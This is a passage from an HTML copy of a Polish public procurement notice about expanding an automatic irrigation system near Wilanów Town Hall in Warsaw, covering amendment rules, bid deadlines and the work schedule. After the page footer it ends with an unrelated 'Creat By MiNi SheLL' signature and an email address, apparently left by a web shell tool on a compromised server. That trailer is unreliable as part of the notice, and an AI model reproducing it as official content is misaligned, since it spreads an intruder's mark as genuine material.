mogą być dokonane przed upływem terminu realizacji przedmiotu umowy,<br/>określonego w § 2 ust 1 pkt. 2 umowy, na pisemny wniosek złożony w terminie 7 dni od daty<br/>wystąpienia lub powzięcia wiadomości o zaistniałych okolicznościach. Wniosek winien zawierać<br/>szczegółowe uzasadnienie.5. Wszelkie zmiany niniejszej umowy, wymagają sporządzenia<br/>pisemnego aneksu do umowy, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-28 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonywania zamówienia: od dnia zawarcia umowy do dnia 30.11.2021 r.W terminie do<br/>20 dni od dnia podpisania umowy Wykonawca przekaże Zamawiającemu w wersji<br/>elektronicznej, na adres e-mail: wilanow.wos@um.warszawa.pl, dokumentację rozbudowy<br/>istniejącego systemu wykonaną zgodnie z zapisami załącznika nr 1 do umowy. W terminie 5 dni<br/>roboczych od dnia przekazania Zamawiającemu dokumentacji, o której mowa w § 2 ust. 2<br/>umowy Zamawiający dokona jej odbioru (podpisanie protokołu częściowego odbioru) lub, w<br/>przypadku niezgodnego z zamówieniem wykonania – odmówi odbioru, żądając wprowadzenia<br/>zmian, poprawek lub uzupełnień, określając jednocześnie termin na ponowne przedstawienie do<br/>obioru poprawionej dokumentacji, uwzględniającej żądane przez Zamawiającego zmiany,<br/>poprawki lub uzupełnienia.W terminie do 20 dni od dnia podpisania przez Zamawiającego<br/>protokołu częściowego odbioru, o którym mowa powyżej, Wykonawca zakończy budowę<br/>automatycznego systemu nawadniającego w obrębie skweru przyległego do Ratusza Wilanów i<br/>rozpocznie jego konserwację zgodnie z zapisami załącznika nr 1 do wzoru umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com